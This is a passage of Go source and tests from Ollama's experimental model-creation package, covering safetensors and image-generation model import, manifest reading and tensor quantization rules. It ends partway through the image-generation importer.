func loadModelConfig(modelName string) (*ModelConfig, error) {
manifest, err := loadManifest(modelName)
if err != nil {
return nil, err
}
// Read the config blob
blobName := strings.Replace(manifest.Config.Digest, ":", "-", 1)
blobPath := filepath.Join(defaultBlobDir(), blobName)
data, err := os.ReadFile(blobPath)
if err != nil {
return nil, err
}
var config ModelConfig
if err := json.Unmarshal(data, &config); err != nil {
return nil, err
}
return &config, nil
}
// IsSafetensorsModel checks if a model was created with the experimental
// safetensors builder by checking the model format in the config.
func IsSafetensorsModel(modelName string) bool {
config, err := loadModelConfig(modelName)
if err != nil {
return false
}
return config.ModelFormat == "safetensors"
}
// IsSafetensorsLLMModel checks if a model is a safetensors LLM model
// (has completion capability, not image generation).
func IsSafetensorsLLMModel(modelName string) bool {
config, err := loadModelConfig(modelName)
if err != nil {
return false
}
return config.ModelFormat == "safetensors" && slices.Contains(config.Capabilities, "completion")
}
// IsImageGenModel checks if a model is an image generation model
// (has image capability).
func IsImageGenModel(modelName string) bool {
config, err := loadModelConfig(modelName)
if err != nil {
return false
}
return config.ModelFormat == "safetensors" && slices.Contains(config.Capabilities, "image")
}
// GetModelArchitecture returns the architecture from the model's config.json layer.
func GetModelArchitecture(modelName string) (string, error) {
manifest, err := loadManifest(modelName)
if err != nil {
return "", err
}
// Find the config.json layer
for _, layer := range manifest.Layers {
if layer.Name == "config.json" && layer.MediaType == "application/vnd.ollama.image.json" {
blobName := strings.Replace(layer.Digest, ":", "-", 1)
blobPath := filepath.Join(defaultBlobDir(), blobName)
data, err := os.ReadFile(blobPath)
if err != nil {
return "", err
}
var cfg struct {
Architectures []string `json:"architectures"`
ModelType string `json:"model_type"`
}
if err := json.Unmarshal(data, &cfg); err != nil {
return "", err
}
// Prefer model_type, fall back to first architecture
if cfg.ModelType != "" {
return cfg.ModelType, nil
}
if len(cfg.Architectures) > 0 {
return cfg.Architectures[0], nil
}
}
}
return "", fmt.Errorf("architecture not found in model config")
}
// IsTensorModelDir checks if the directory contains a diffusers-style tensor model
// by looking for model_index.json, which is the standard diffusers pipeline config.
func IsTensorModelDir(dir string) bool {
_, err := os.Stat(filepath.Join(dir, "model_index.json"))
return err == nil
}
// IsSafetensorsModelDir checks if the directory contains a standard safetensors model
// by looking for config.json and at least one .safetensors file.
func IsSafetensorsModelDir(dir string) bool {
// Must have config.json
if _, err := os.Stat(filepath.Join(dir, "config.json")); err != nil {
return false
}
// Must have at least one .safetensors file
entries, err := os.ReadDir(dir)
if err != nil {
return false
}
for _, entry := range entries {
if strings.HasSuffix(entry.Name(), ".safetensors") {
return true
}
}
return false
}
// LayerInfo holds metadata for a created layer.
type LayerInfo struct {
Digest string
Size int64
MediaType string
Name string // Path-style name: "component/tensor" or "path/to/config.json"
}
// LayerCreator is called to create a blob layer.
// name is the path-style name (e.g., "tokenizer/tokenizer.json")
type LayerCreator func(r io.Reader, mediaType, name string) (LayerInfo, error)
// TensorLayerCreator creates a tensor blob layer with metadata.
// name is the path-style name including component (e.g., "text_encoder/model.embed_tokens.weight")
type TensorLayerCreator func(r io.Reader, name, dtype string, shape []int32) (LayerInfo, error)
// QuantizingTensorLayerCreator creates tensor layers with optional quantization.
// When quantize is non-empty (e.g., "fp8"), returns multiple layers (weight + scales + biases).
type QuantizingTensorLayerCreator func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error)
// ManifestWriter writes the manifest file.
type ManifestWriter func(modelName string, config LayerInfo, layers []LayerInfo) error
// ShouldQuantize returns true if a tensor should be quantized.
// For image gen models (component non-empty): quantizes linear weights, skipping VAE, embeddings, norms.
// For LLM models (component empty): quantizes linear weights, skipping embeddings, norms, and small tensors.
func ShouldQuantize(name, component string) bool {
// Image gen specific: skip VAE entirely
if component == "vae" {
return false
}
// Skip embeddings
if strings.Contains(name, "embed") {
return false
}
// Skip layer norms and RMS norms
if strings.Contains(name, "norm") || strings.Contains(name, "ln_") || strings.Contains(name, "layernorm") {
return false
}
// Skip biases
if strings.HasSuffix(name, ".bias") {
return false
}
// Only quantize weights
return strings.HasSuffix(name, ".weight")
}
// ShouldQuantizeTensor returns true if a tensor should be quantized based on name and shape.
// This is a more detailed check that also considers tensor dimensions.
func ShouldQuantizeTensor(name string, shape []int32) bool {
// Use basic name-based check first
if !ShouldQuantize(name, "") {
return false
}
// Only quantize 2D tensors (linear layers) - skip 1D (biases, norms) and higher-D (convolutions if any)
if len(shape) != 2 {
return false
}
// Skip small tensors (less than 1024 elements) - not worth quantizing
if len(shape) >= 2 && int64(shape[0])*int64(shape[1]) < 1024 {
return false
}
// MLX quantization requires last dimension to be divisible by group size (32)
if shape[len(shape)-1]%32 != 0 {
return false
}
return true
}
// CreateSafetensorsModel imports a standard safetensors model from a directory.
// This handles Hugging Face style models with config.json and *.safetensors files.
// Stores each tensor as a separate blob for fine-grained deduplication.
// If quantize is non-empty (e.g., "fp8"), eligible tensors will be quantized.
func CreateSafetensorsModel(modelName, modelDir, quantize string, createLayer LayerCreator, createTensorLayer QuantizingTensorLayerCreator, writeManifest ManifestWriter, fn func(status string)) error {
var layers []LayerInfo
var configLayer LayerInfo
entries, err := os.ReadDir(modelDir)
if err != nil {
return fmt.Errorf("failed to read directory: %w", err)
}
// Process all safetensors files
for _, entry := range entries {
if entry.IsDir() || !strings.HasSuffix(entry.Name(), ".safetensors") {
continue
}
stPath := filepath.Join(modelDir, entry.Name())
// Extract individual tensors from safetensors file
extractor, err := safetensors.OpenForExtraction(stPath)
if err != nil {
return fmt.Errorf("failed to open %s: %w", stPath, err)
}
tensorNames := extractor.ListTensors()
quantizeMsg := ""
if quantize != "" {
quantizeMsg = fmt.Sprintf(", quantizing to %s", quantize)
}
fn(fmt.Sprintf("importing %s (%d tensors%s)", entry.Name(), len(tensorNames), quantizeMsg))
for _, tensorName := range tensorNames {
td, err := extractor.GetTensor(tensorName)
if err != nil {
extractor.Close()
return fmt.Errorf("failed to get tensor %s: %w", tensorName, err)
}
// Determine quantization type for this tensor (empty string if not quantizing)
quantizeType := ""
if quantize != "" && ShouldQuantizeTensor(tensorName, td.Shape) {
quantizeType = quantize
}
// Store as minimal safetensors format (88 bytes header overhead)
// This enables native mmap loading via mlx_load_safetensors
// createTensorLayer returns multiple layers if quantizing (weight + scales)
newLayers, err := createTensorLayer(td.SafetensorsReader(), tensorName, td.Dtype, td.Shape, quantizeType)
if err != nil {
extractor.Close()
return fmt.Errorf("failed to create layer for %s: %w", tensorName, err)
}
layers = append(layers, newLayers...)
}
extractor.Close()
}
// Process all JSON config files
for _, entry := range entries {
if entry.IsDir() || !strings.HasSuffix(entry.Name(), ".json") {
continue
}
// Skip the index file as we don't need it after extraction
if entry.Name() == "model.safetensors.index.json" {
continue
}
cfgPath := entry.Name()
fullPath := filepath.Join(modelDir, cfgPath)
fn(fmt.Sprintf("importing config %s", cfgPath))
f, err := os.Open(fullPath)
if err != nil {
return fmt.Errorf("failed to open %s: %w", cfgPath, err)
}
layer, err := createLayer(f, "application/vnd.ollama.image.json", cfgPath)
f.Close()
if err != nil {
return fmt.Errorf("failed to create layer for %s: %w", cfgPath, err)
}
// Use config.json as the config layer
if cfgPath == "config.json" {
configLayer = layer
}
layers = append(layers, layer)
}
if configLayer.Digest == "" {
return fmt.Errorf("config.json not found in %s", modelDir)
}
fn(fmt.Sprintf("writing manifest for %s", modelName))
if err := writeManifest(modelName, configLayer, layers); err != nil {
return fmt.Errorf("failed to write manifest: %w", err)
}
fn(fmt.Sprintf("successfully imported %s with %d layers", modelName, len(layers)))
return nil
}

752
x/create/create_test.go Normal file
View File

@@ -0,0 +1,752 @@
package create
import (
"bytes"
"encoding/binary"
"encoding/json"
"io"
"os"
"path/filepath"
"strings"
"testing"
)
func TestIsTensorModelDir(t *testing.T) {
tests := []struct {
name string
setup func(dir string) error
expected bool
}{
{
name: "valid diffusers model with model_index.json",
setup: func(dir string) error {
return os.WriteFile(filepath.Join(dir, "model_index.json"), []byte(`{"_class_name": "FluxPipeline"}`), 0o644)
},
expected: true,
},
{
name: "empty directory",
setup: func(dir string) error {
return nil
},
expected: false,
},
{
name: "directory with other files but no model_index.json",
setup: func(dir string) error {
return os.WriteFile(filepath.Join(dir, "config.json"), []byte(`{}`), 0o644)
},
expected: false,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
dir := t.TempDir()
if err := tt.setup(dir); err != nil {
t.Fatalf("setup failed: %v", err)
}
got := IsTensorModelDir(dir)
if got != tt.expected {
t.Errorf("IsTensorModelDir() = %v, want %v", got, tt.expected)
}
})
}
}
func TestIsSafetensorsModelDir(t *testing.T) {
tests := []struct {
name string
setup func(dir string) error
expected bool
}{
{
name: "valid safetensors model with config.json and .safetensors file",
setup: func(dir string) error {
if err := os.WriteFile(filepath.Join(dir, "config.json"), []byte(`{"model_type": "gemma3"}`), 0o644); err != nil {
return err
}
return os.WriteFile(filepath.Join(dir, "model.safetensors"), []byte("dummy"), 0o644)
},
expected: true,
},
{
name: "config.json only, no safetensors files",
setup: func(dir string) error {
return os.WriteFile(filepath.Join(dir, "config.json"), []byte(`{}`), 0o644)
},
expected: false,
},
{
name: "safetensors file only, no config.json",
setup: func(dir string) error {
return os.WriteFile(filepath.Join(dir, "model.safetensors"), []byte("dummy"), 0o644)
},
expected: false,
},
{
name: "empty directory",
setup: func(dir string) error {
return nil
},
expected: false,
},
{
name: "multiple safetensors files with config.json",
setup: func(dir string) error {
if err := os.WriteFile(filepath.Join(dir, "config.json"), []byte(`{}`), 0o644); err != nil {
return err
}
if err := os.WriteFile(filepath.Join(dir, "model-00001-of-00002.safetensors"), []byte("dummy"), 0o644); err != nil {
return err
}
return os.WriteFile(filepath.Join(dir, "model-00002-of-00002.safetensors"), []byte("dummy"), 0o644)
},
expected: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
dir := t.TempDir()
if err := tt.setup(dir); err != nil {
t.Fatalf("setup failed: %v", err)
}
got := IsSafetensorsModelDir(dir)
if got != tt.expected {
t.Errorf("IsSafetensorsModelDir() = %v, want %v", got, tt.expected)
}
})
}
}
func TestIsSafetensorsModelDir_NonexistentDir(t *testing.T) {
got := IsSafetensorsModelDir("/nonexistent/path/that/does/not/exist")
if got != false {
t.Errorf("IsSafetensorsModelDir() = %v for nonexistent dir, want false", got)
}
}
// createMinimalSafetensors creates a minimal valid safetensors file with one tensor
func createMinimalSafetensors(t *testing.T, path string) {
t.Helper()
// Create a minimal safetensors file with a single float32 tensor
header := map[string]interface{}{
"test_tensor": map[string]interface{}{
"dtype": "F32",
"shape": []int{2, 2},
"data_offsets": []int{0, 16}, // 4 float32 values = 16 bytes
},
}
headerJSON, err := json.Marshal(header)
if err != nil {
t.Fatalf("failed to marshal header: %v", err)
}
// Pad header to 8-byte alignment
padding := (8 - len(headerJSON)%8) % 8
headerJSON = append(headerJSON, bytes.Repeat([]byte(" "), padding)...)
// Write file
f, err := os.Create(path)
if err != nil {
t.Fatalf("failed to create file: %v", err)
}
defer f.Close()
// Write header size (8 bytes, little endian)
if err := binary.Write(f, binary.LittleEndian, uint64(len(headerJSON))); err != nil {
t.Fatalf("failed to write header size: %v", err)
}
// Write header
if _, err := f.Write(headerJSON); err != nil {
t.Fatalf("failed to write header: %v", err)
}
// Write tensor data (16 bytes of zeros for 4 float32 values)
if _, err := f.Write(make([]byte, 16)); err != nil {
t.Fatalf("failed to write tensor data: %v", err)
}
}
func TestCreateSafetensorsModel(t *testing.T) {
dir := t.TempDir()
// Create config.json
configJSON := `{"model_type": "test", "architectures": ["TestModel"]}`
if err := os.WriteFile(filepath.Join(dir, "config.json"), []byte(configJSON), 0o644); err != nil {
t.Fatalf("failed to write config.json: %v", err)
}
// Create a minimal safetensors file
createMinimalSafetensors(t, filepath.Join(dir, "model.safetensors"))
// Track what was created
var createdLayers []LayerInfo
var manifestWritten bool
var manifestModelName string
var manifestConfigLayer LayerInfo
var manifestLayers []LayerInfo
var statusMessages []string
// Mock callbacks
createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
data, err := io.ReadAll(r)
if err != nil {
return LayerInfo{}, err
}
layer := LayerInfo{
Digest: "sha256:test",
Size: int64(len(data)),
MediaType: mediaType,
Name: name,
}
createdLayers = append(createdLayers, layer)
return layer, nil
}
createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
data, err := io.ReadAll(r)
if err != nil {
return nil, err
}
layer := LayerInfo{
Digest: "sha256:tensor_" + name,
Size: int64(len(data)),
MediaType: "application/vnd.ollama.image.tensor",
Name: name,
}
createdLayers = append(createdLayers, layer)
return []LayerInfo{layer}, nil
}
writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
manifestWritten = true
manifestModelName = modelName
manifestConfigLayer = config
manifestLayers = layers
return nil
}
progressFn := func(status string) {
statusMessages = append(statusMessages, status)
}
// Run CreateSafetensorsModel
err := CreateSafetensorsModel("test-model", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
if err != nil {
t.Fatalf("CreateSafetensorsModel failed: %v", err)
}
// Verify manifest was written
if !manifestWritten {
t.Error("manifest was not written")
}
if manifestModelName != "test-model" {
t.Errorf("manifest model name = %q, want %q", manifestModelName, "test-model")
}
// Verify config layer was set
if manifestConfigLayer.Name != "config.json" {
t.Errorf("config layer name = %q, want %q", manifestConfigLayer.Name, "config.json")
}
// Verify we have at least one tensor and one config layer
hasTensor := false
hasConfig := false
for _, layer := range manifestLayers {
if layer.Name == "test_tensor" {
hasTensor = true
}
if layer.Name == "config.json" {
hasConfig = true
}
}
if !hasTensor {
t.Error("no tensor layer found in manifest")
}
if !hasConfig {
t.Error("no config layer found in manifest")
}
// Verify status messages were sent
if len(statusMessages) == 0 {
t.Error("no status messages received")
}
}
func TestCreateSafetensorsModel_NoConfigJson(t *testing.T) {
dir := t.TempDir()
// Create only a safetensors file, no config.json
createMinimalSafetensors(t, filepath.Join(dir, "model.safetensors"))
// Mock callbacks (minimal)
createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
io.ReadAll(r)
return LayerInfo{Name: name}, nil
}
createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
io.ReadAll(r)
return []LayerInfo{{Name: name}}, nil
}
writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
return nil
}
progressFn := func(status string) {}
err := CreateSafetensorsModel("test-model", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
if err == nil {
t.Error("expected error for missing config.json, got nil")
}
}
func TestCreateSafetensorsModel_EmptyDir(t *testing.T) {
dir := t.TempDir()
// Mock callbacks
createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
return LayerInfo{}, nil
}
createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
return []LayerInfo{{}}, nil
}
writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
return nil
}
progressFn := func(status string) {}
err := CreateSafetensorsModel("test-model", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
if err == nil {
t.Error("expected error for empty directory, got nil")
}
}
func TestCreateSafetensorsModel_SkipsIndexJson(t *testing.T) {
dir := t.TempDir()
// Create config.json
if err := os.WriteFile(filepath.Join(dir, "config.json"), []byte(`{}`), 0o644); err != nil {
t.Fatalf("failed to write config.json: %v", err)
}
// Create model.safetensors.index.json (should be skipped)
indexJSON := `{"metadata": {"total_size": 100}, "weight_map": {}}`
if err := os.WriteFile(filepath.Join(dir, "model.safetensors.index.json"), []byte(indexJSON), 0o644); err != nil {
t.Fatalf("failed to write index.json: %v", err)
}
// Create a minimal safetensors file
createMinimalSafetensors(t, filepath.Join(dir, "model.safetensors"))
var configNames []string
createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
io.ReadAll(r)
configNames = append(configNames, name)
return LayerInfo{Name: name, Digest: "sha256:test"}, nil
}
createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
io.ReadAll(r)
return []LayerInfo{{Name: name}}, nil
}
writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
return nil
}
progressFn := func(status string) {}
err := CreateSafetensorsModel("test-model", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
if err != nil {
t.Fatalf("CreateSafetensorsModel failed: %v", err)
}
// Verify model.safetensors.index.json was not included
for _, name := range configNames {
if name == "model.safetensors.index.json" {
t.Error("model.safetensors.index.json should have been skipped")
}
}
}
func TestResolveManifestPath(t *testing.T) {
tests := []struct {
name string
modelName string
wantParts []string // Parts that should appear in the path
}{
{
name: "simple model name",
modelName: "llama2",
wantParts: []string{"registry.ollama.ai", "library", "llama2", "latest"},
},
{
name: "model name with tag",
modelName: "llama2:7b",
wantParts: []string{"registry.ollama.ai", "library", "llama2", "7b"},
},
{
name: "model name with namespace",
modelName: "myuser/mymodel",
wantParts: []string{"registry.ollama.ai", "myuser", "mymodel", "latest"},
},
{
name: "model name with namespace and tag",
modelName: "myuser/mymodel:v1",
wantParts: []string{"registry.ollama.ai", "myuser", "mymodel", "v1"},
},
{
name: "fully qualified model name",
modelName: "registry.example.com/namespace/model:tag",
wantParts: []string{"registry.example.com", "namespace", "model", "tag"},
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got := resolveManifestPath(tt.modelName)
for _, part := range tt.wantParts {
if !strings.Contains(got, part) {
t.Errorf("resolveManifestPath(%q) = %q, missing part %q", tt.modelName, got, part)
}
}
})
}
}
func TestLayerInfo(t *testing.T) {
layer := LayerInfo{
Digest: "sha256:abc123",
Size: 1024,
MediaType: "application/vnd.ollama.image.tensor",
Name: "model.weight",
}
if layer.Digest != "sha256:abc123" {
t.Errorf("Digest = %q, want %q", layer.Digest, "sha256:abc123")
}
if layer.Size != 1024 {
t.Errorf("Size = %d, want %d", layer.Size, 1024)
}
if layer.MediaType != "application/vnd.ollama.image.tensor" {
t.Errorf("MediaType = %q, want %q", layer.MediaType, "application/vnd.ollama.image.tensor")
}
if layer.Name != "model.weight" {
t.Errorf("Name = %q, want %q", layer.Name, "model.weight")
}
}
func TestModelConfig(t *testing.T) {
config := ModelConfig{
ModelFormat: "safetensors",
Capabilities: []string{"completion", "chat"},
}
if config.ModelFormat != "safetensors" {
t.Errorf("ModelFormat = %q, want %q", config.ModelFormat, "safetensors")
}
if len(config.Capabilities) != 2 {
t.Errorf("Capabilities length = %d, want %d", len(config.Capabilities), 2)
}
}
func TestManifest(t *testing.T) {
manifest := Manifest{
SchemaVersion: 2,
MediaType: "application/vnd.oci.image.manifest.v1+json",
Config: ManifestLayer{
MediaType: "application/vnd.docker.container.image.v1+json",
Digest: "sha256:config",
Size: 100,
},
Layers: []ManifestLayer{
{
MediaType: "application/vnd.ollama.image.tensor",
Digest: "sha256:layer1",
Size: 1000,
Name: "weight.bin",
},
},
}
if manifest.SchemaVersion != 2 {
t.Errorf("SchemaVersion = %d, want %d", manifest.SchemaVersion, 2)
}
if manifest.Config.Digest != "sha256:config" {
t.Errorf("Config.Digest = %q, want %q", manifest.Config.Digest, "sha256:config")
}
if len(manifest.Layers) != 1 {
t.Errorf("Layers length = %d, want %d", len(manifest.Layers), 1)
}
if manifest.Layers[0].Name != "weight.bin" {
t.Errorf("Layers[0].Name = %q, want %q", manifest.Layers[0].Name, "weight.bin")
}
}
func TestShouldQuantize(t *testing.T) {
tests := []struct {
name string
tensor string
component string
want bool
}{
// VAE component should never be quantized
{"vae weight", "decoder.weight", "vae", false},
{"vae bias", "decoder.bias", "vae", false},
// Embeddings should not be quantized
{"embedding weight", "embed_tokens.weight", "", false},
{"embedding in name", "token_embedding.weight", "", false},
// Norms should not be quantized
{"layer norm", "layer_norm.weight", "", false},
{"rms norm", "rms_norm.weight", "", false},
{"ln prefix", "ln_1.weight", "", false},
{"layernorm in name", "input_layernorm.weight", "", false},
// Biases should not be quantized
{"bias tensor", "attention.bias", "", false},
{"proj bias", "o_proj.bias", "", false},
// Linear weights should be quantized
{"linear weight", "q_proj.weight", "", true},
{"attention weight", "self_attn.weight", "", true},
{"mlp weight", "mlp.gate_proj.weight", "", true},
// Transformer component weights should be quantized
{"transformer weight", "layers.0.weight", "transformer", true},
{"text_encoder weight", "encoder.weight", "text_encoder", true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got := ShouldQuantize(tt.tensor, tt.component)
if got != tt.want {
t.Errorf("ShouldQuantize(%q, %q) = %v, want %v", tt.tensor, tt.component, got, tt.want)
}
})
}
}
func TestShouldQuantizeTensor(t *testing.T) {
tests := []struct {
name string
tensor string
shape []int32
want bool
}{
// 2D tensors with sufficient size should be quantized
{"large 2D weight", "q_proj.weight", []int32{4096, 4096}, true},
{"medium 2D weight", "small_proj.weight", []int32{128, 128}, true},
// Small tensors should not be quantized (< 1024 elements)
{"tiny 2D weight", "tiny.weight", []int32{16, 16}, false},
{"small 2D weight", "small.weight", []int32{31, 31}, false},
// 1D tensors should not be quantized
{"1D tensor", "layer_norm.weight", []int32{4096}, false},
// 3D+ tensors should not be quantized
{"3D tensor", "conv.weight", []int32{64, 64, 3}, false},
{"4D tensor", "conv2d.weight", []int32{64, 64, 3, 3}, false},
// Embeddings should not be quantized regardless of shape
{"embedding 2D", "embed_tokens.weight", []int32{32000, 4096}, false},
// Norms should not be quantized regardless of shape
{"norm 2D", "layer_norm.weight", []int32{4096, 1}, false},
// Biases should not be quantized
{"bias 2D", "proj.bias", []int32{4096, 1}, false},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got := ShouldQuantizeTensor(tt.tensor, tt.shape)
if got != tt.want {
t.Errorf("ShouldQuantizeTensor(%q, %v) = %v, want %v", tt.tensor, tt.shape, got, tt.want)
}
})
}
}
func TestCreateSafetensorsModel_WithQuantize(t *testing.T) {
dir := t.TempDir()
// Create config.json
configJSON := `{"model_type": "test", "architectures": ["TestModel"]}`
if err := os.WriteFile(filepath.Join(dir, "config.json"), []byte(configJSON), 0o644); err != nil {
t.Fatalf("failed to write config.json: %v", err)
}
// Create a minimal safetensors file
createMinimalSafetensors(t, filepath.Join(dir, "model.safetensors"))
var quantizeRequested []string
createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
io.ReadAll(r)
return LayerInfo{Name: name, Digest: "sha256:test"}, nil
}
createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
io.ReadAll(r)
quantizeRequested = append(quantizeRequested, quantize)
return []LayerInfo{{Name: name}}, nil
}
writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
return nil
}
progressFn := func(status string) {}
// Run with quantize enabled
err := CreateSafetensorsModel("test-model", dir, "fp8", createLayer, createTensorLayer, writeManifest, progressFn)
if err != nil {
t.Fatalf("CreateSafetensorsModel failed: %v", err)
}
// Verify quantize was passed to callback (will be false for small test tensor)
if len(quantizeRequested) == 0 {
t.Error("no tensors processed")
}
}
// createMinimalImageGenModel creates a minimal diffusers-style model directory
func createMinimalImageGenModel(t *testing.T, dir string) {
t.Helper()
// Create model_index.json
modelIndex := `{"_class_name": "FluxPipeline", "_diffusers_version": "0.30.0"}`
if err := os.WriteFile(filepath.Join(dir, "model_index.json"), []byte(modelIndex), 0o644); err != nil {
t.Fatalf("failed to write model_index.json: %v", err)
}
// Create transformer directory with a safetensors file
transformerDir := filepath.Join(dir, "transformer")
if err := os.MkdirAll(transformerDir, 0o755); err != nil {
t.Fatalf("failed to create transformer dir: %v", err)
}
createMinimalSafetensors(t, filepath.Join(transformerDir, "model.safetensors"))
// Create transformer config
transformerConfig := `{"hidden_size": 3072}`
if err := os.WriteFile(filepath.Join(transformerDir, "config.json"), []byte(transformerConfig), 0o644); err != nil {
t.Fatalf("failed to write transformer config: %v", err)
}
}
func TestCreateImageGenModel(t *testing.T) {
dir := t.TempDir()
createMinimalImageGenModel(t, dir)
var manifestWritten bool
var manifestModelName string
var statusMessages []string
createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
io.ReadAll(r)
return LayerInfo{Name: name, Digest: "sha256:test"}, nil
}
createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
io.ReadAll(r)
return []LayerInfo{{Name: name, Digest: "sha256:tensor"}}, nil
}
writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
manifestWritten = true
manifestModelName = modelName
return nil
}
progressFn := func(status string) {
statusMessages = append(statusMessages, status)
}
err := CreateImageGenModel("test-imagegen", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
if err != nil {
t.Fatalf("CreateImageGenModel failed: %v", err)
}
if !manifestWritten {
t.Error("manifest was not written")
}
if manifestModelName != "test-imagegen" {
t.Errorf("manifest model name = %q, want %q", manifestModelName, "test-imagegen")
}
if len(statusMessages) == 0 {
t.Error("no status messages received")
}
}
func TestCreateImageGenModel_NoModelIndex(t *testing.T) {
dir := t.TempDir()
// Create only transformer without model_index.json
transformerDir := filepath.Join(dir, "transformer")
if err := os.MkdirAll(transformerDir, 0o755); err != nil {
t.Fatalf("failed to create transformer dir: %v", err)
}
createMinimalSafetensors(t, filepath.Join(transformerDir, "model.safetensors"))
createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
io.ReadAll(r)
return LayerInfo{Name: name}, nil
}
createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
io.ReadAll(r)
return []LayerInfo{{Name: name}}, nil
}
writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
return nil
}
progressFn := func(status string) {}
err := CreateImageGenModel("test-imagegen", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
if err == nil {
t.Error("expected error for missing model_index.json, got nil")
}
}
func TestCreateImageGenModel_WithQuantize(t *testing.T) {
dir := t.TempDir()
createMinimalImageGenModel(t, dir)
var quantizeRequested []string
createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
io.ReadAll(r)
return LayerInfo{Name: name, Digest: "sha256:test"}, nil
}
createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
io.ReadAll(r)
quantizeRequested = append(quantizeRequested, quantize)
return []LayerInfo{{Name: name}}, nil
}
writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
return nil
}
progressFn := func(status string) {}
err := CreateImageGenModel("test-imagegen", dir, "fp8", createLayer, createTensorLayer, writeManifest, progressFn)
if err != nil {
t.Fatalf("CreateImageGenModel failed: %v", err)
}
if len(quantizeRequested) == 0 {
t.Error("no tensors processed")
}
}

222
x/create/imagegen.go Normal file
View File

@@ -0,0 +1,222 @@
package create
import (
"bytes"
"encoding/json"
"fmt"
"io"
"os"
"path/filepath"
"strings"
"github.com/ollama/ollama/x/imagegen/safetensors"
)
// CreateImageGenModel imports an image generation model from a directory.
// Stores each tensor as a separate blob for fine-grained deduplication.
// If quantize is specified, linear weights in transformer/text_encoder are quantized.
// Supported quantization types: fp8 (or empty for no quantization).
// Layer creation and manifest writing are done via callbacks to avoid import cycles.
func CreateImageGenModel(modelName, modelDir, quantize string, createLayer LayerCreator, createTensorLayer QuantizingTensorLayerCreator, writeManifest ManifestWriter, fn func(status string)) error {
// Validate quantization type
switch quantize {
case "", "fp8":
// valid
default:
return fmt.Errorf("unsupported quantization type %q: supported types are fp8", quantize)
}
var layers []LayerInfo
var configLayer LayerInfo
var totalParams int64 // Count parameters from original tensor shapes
var torchDtype string // Read from component config for quantization display
// Components to process - extract individual tensors from each
components := []string{"text_encoder", "transformer", "vae"}
for _, component := range components {
componentDir := filepath.Join(modelDir, component)
if _, err := os.Stat(componentDir); os.IsNotExist(err) {
continue
}
// Find all safetensors files in this component
entries, err := os.ReadDir(componentDir)
if err != nil {
return fmt.Errorf("failed to read %s: %w", component, err)
}
for _, entry := range entries {
if !strings.HasSuffix(entry.Name(), ".safetensors") {
continue
}
stPath := filepath.Join(componentDir, entry.Name())
// Extract individual tensors from safetensors file
extractor, err := safetensors.OpenForExtraction(stPath)
if err != nil {
return fmt.Errorf("failed to open %s: %w", stPath, err)
}
tensorNames := extractor.ListTensors()
quantizeMsg := ""
if quantize != "" && component != "vae" {
quantizeMsg = ", quantizing to " + quantize
}
fn(fmt.Sprintf("importing %s/%s (%d tensors%s)", component, entry.Name(), len(tensorNames), quantizeMsg))
for _, tensorName := range tensorNames {
td, err := extractor.GetTensor(tensorName)
if err != nil {
extractor.Close()
return fmt.Errorf("failed to get tensor %s: %w", tensorName, err)
}
// Count parameters from original tensor shape
if len(td.Shape) > 0 {
numElements := int64(1)
for _, dim := range td.Shape {
numElements *= int64(dim)
}
totalParams += numElements
}
// Store as minimal safetensors format (88 bytes header overhead)
// This enables native mmap loading via mlx_load_safetensors
// Use path-style name: "component/tensor_name"
fullName := component + "/" + tensorName
// Determine quantization type for this tensor (empty string if not quantizing)
quantizeType := ""
if quantize != "" && ShouldQuantize(tensorName, component) && canQuantizeShape(td.Shape) {
quantizeType = quantize
}
// createTensorLayer returns multiple layers if quantizing (weight + scales)
newLayers, err := createTensorLayer(td.SafetensorsReader(), fullName, td.Dtype, td.Shape, quantizeType)
if err != nil {
extractor.Close()
return fmt.Errorf("failed to create layer for %s: %w", fullName, err)
}
layers = append(layers, newLayers...)
}
extractor.Close()
}
}
// Read torch_dtype from text_encoder config for quantization display
if torchDtype == "" {
textEncoderConfig := filepath.Join(modelDir, "text_encoder/config.json")
if data, err := os.ReadFile(textEncoderConfig); err == nil {
var cfg struct {
TorchDtype string `json:"torch_dtype"`
}
if json.Unmarshal(data, &cfg) == nil && cfg.TorchDtype != "" {
torchDtype = cfg.TorchDtype
}
}
}
// Import config files
configFiles := []string{
"model_index.json",
